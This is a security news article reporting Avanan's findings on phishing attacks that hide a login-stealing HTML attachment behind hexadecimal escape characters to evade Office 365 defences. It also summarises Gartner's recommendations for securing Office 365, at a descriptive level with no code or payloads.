Cybercriminals are increasingly leveraging hexadecimal escape characters, a sophisticated type of character encoding, to bypass Microsoft Office 365 security protocols, according to cloud security platform provider Avanan.
With hexadecimal escape characters, cybercriminals can launch a phishing attack that uses an HTML attachment with a JavaScript snippet, according to Avanan. Malicious content is encoded in hexadecimal escape characters, ensuring no links are visible, Avanan said.
When an HTML attachment is opened, it presents a locally generated phishing page with login instructions, Avanan noted in a blog post. If users enter their credentials and click the submit button, they instantly send their information to hackers.
Ultimately, there are several factors that make a hexadecimal escape characters phishing attack unique, Avanan stated. These factors include:
- If a user scans a malicious HTML file with most antivirus solutions or emulates the file in most sandboxes, the file is not identified as malicious.
- The HTML file includes a submit button, and most sandboxes do not consider an HTML file with a submit button to be malicious.
- The email body itself contains no links, which negates many of the "safe-link" methods used by Microsoft and other security vendors.
- The fake "login" screen is local; this means nothing is sent or received until a user clicks "submit," and firewalls and browser plugins that use URL reputation for IDs and domains are rendered useless.
The hexadecimal escape characters phishing attack can bypass most security tools, including Office 365's default security, Avanan pointed out. However, Avanan stated organizations that use anti-phishing machine learning technologies may be better equipped than others to identify and address this type of attack, along with many other cyber threats.
Gartner's Advice on Office 365 Security
Expect the number of Office 365 deployments – and demand for advanced Office 365 security solutions – to increase over the next few years, according to Gartner.
The technology research firm has predicted Office 365 deployments that rely on third-party tools to fill gaps in security and compliance will increase from 15 percent last year to 40 percent in 2018. In addition, Gartner has projected 50 percent of organizations using Office 365 will rely on non-Microsoft security tools to maintain consistent security policies across their multivendor "SaaSscape" by 2020.
To help organizations secure Office 365 environments, Gartner offered the following recommendations:
- Determine whether Microsoft's native capabilities are sufficient.
- Examine third-party alternatives when security gaps prevent an organization from implementing effective security policies.
- Deploy an identity, access and privilege management strategy.
- Implement visibility, data security, threat protection and device management controls using native Office 365 capabilities.
- Collaborate with a cloud access security broker to develop consistent security policies across all Office 365 services and non-Microsoft SaaS applications.
Also, IT security teams should create a framework to evaluate Office 365 security controls, Gartner stated. This framework enables IT security teams to take a proactive approach to mitigate Office 365 threats, Gartner said, and identify opportunities for future enhancements with third-party tools.